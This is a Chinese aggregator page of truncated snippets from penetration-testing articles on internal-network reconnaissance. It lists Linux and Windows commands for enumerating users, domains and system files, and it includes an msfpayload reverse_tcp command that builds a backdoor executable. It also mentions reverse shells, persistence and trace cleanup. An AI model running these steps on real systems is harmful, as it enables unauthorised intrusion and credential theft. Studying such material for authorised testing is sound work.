内网渗透之信息收集-linux】的更多相关文章

linux     系统信息         grep MemTotal /proc/meminfo #查看系统内存总量         cat /etc/issue #查看系统名称         cat /etc/lsb-release #查看系统名称.版本号         uname -a #查看内核信息         ls /root | grep vmlinuz #查看内核信息     系统信息         grep MemTotal /proc/meminfo #查看系统内存…
linux 系统信息 grep MenTotal /proc/meminfo #查看系统内存总量 cat /etc/issue #查看系统名称 cat /etc/lsb-release #查看系统名称.版本号 uname -a #查看内核信息 ls /root | grep vmlinuz #查看内核信息 用户信息 whoami #我现在登录的用户 id #当前用户id id test #查看test用户信息 w #查看当前系统活动用户 lastlog #查看用户登录日志 cat /etc/pa…
windows 用户相关 query user #查看当前在线的用户 whoami #查看当前用户 net user #查看当前系统全部用户 net1 user #查看当前系统全部用户(高权限命令) net user /domain #查看当前域全部用户 net user administrator #查看admin用户详细信息 net localgroup #查看本地用户组 net localgroup administrators #查看组中成员描述 网络相关 ipconfig /all #…
一.基础信息收集 1.信息收集类型 操作系统版本.内核.架构 是否在虚拟化环境中,已安装的程序.补丁 网络配置及连接 防火墙设置 用户信息.历史纪录(浏览器.登陆密码) 共享信息.敏感文件.缓存信息.服务等 2.系统信息 systeminfo 功能:心事有关计算机及其操作系统的详细配置,包括操作系统配置,安全信息,产品ID和硬件属性(如RAM,磁盘空间和网卡) Egg systeminfo /fo:csv 输出为csv格式,默认为list格式显示有关计算机及其操作系统的详细配置信息,包括操作系统…
linux信息搜集 目录 1. linux信息搜集 2. nmap漏洞复现 3. msf linux模块反弹shell 1. linux信息搜集 id 查看当前用户的权限和所在的管理组 python -c "import pty;pty.spawn('/bin/bash');" 会话提升 uname -a 查看linux版本内核信息 cat /etc/*release 查看linux发行信息 dpkg -l 查看安装的包 crontab -l 是否有计划任务(这边显示没有计划任务) /…
用户相关 query user #查看当前在线的用户 whoami #查看当前用户 net user #查看当前系统全部用户 net1 user #查看当前系统全部用户(高权限命令) net user /domain #查看当前域全部用户 net user administrator #查看admin用户详细信息 net localgroup #查看本地用户组 net localgroup administrators #查看组中成员描述 网络相关 ipconfig /all #查看全部ip信息…
Linux虽然没有域环境,但是当我们拿到一台Linux 系统权限,难道只进行一下提权,捕获一下敏感信息就结束了吗?显然不只是这样的.本片文章将从拿到一个Linux shell开始,介绍Linux内网渗透技术,分为容器逃逸.Linux提权.Linux信息收集.Linux隧道技术.Linux横向移动.Linux权限维持.Linux痕迹清理几个部分. 容器逃逸 容器逃逸的应用主要是,拿到shell之后,发现是docker环境,要进一步渗透,就必须逃逸到宿主机. 容器逃逸方法见: https://www…
版权声明:本文为博主的原创文章,未经博主同意不得转载. 写在前面 每个人都有自己的思路和技巧,以前遇到一些linux的环境.这次找来一个站点来进行内网,写下自己的想法 目标环境 1.linux  2.6.32-358  cpu 架构(x86_64)AND发行版 Red Hat Enterprise Linux Server release 6.4 2.DMZ+防火墙+行为监控,外网开放8080 8084 ... 3.服务器有utibadn用户的权限一枚 Shell具体怎么拿到的就不说了,记录下自…
x01 reverse the shell File 通常做法是使用msfpayload生成一个backdoor.exe然后上传到目标机器执行.本地监听即可获得meterpreter shell. reverse_tcp/http/https => exe => victim => shell reverse_tcp windows: msfpayload windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPOR…
0x01 reverse the shell File 通常做法是使用msfpayload生成一个backdoor.exe然后上传到目标机器执行.本地监听即可获得meterpreter shell. reverse_tcp/http/https => exe => victim => shell reverse_tcp windows: msfpayload windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPO…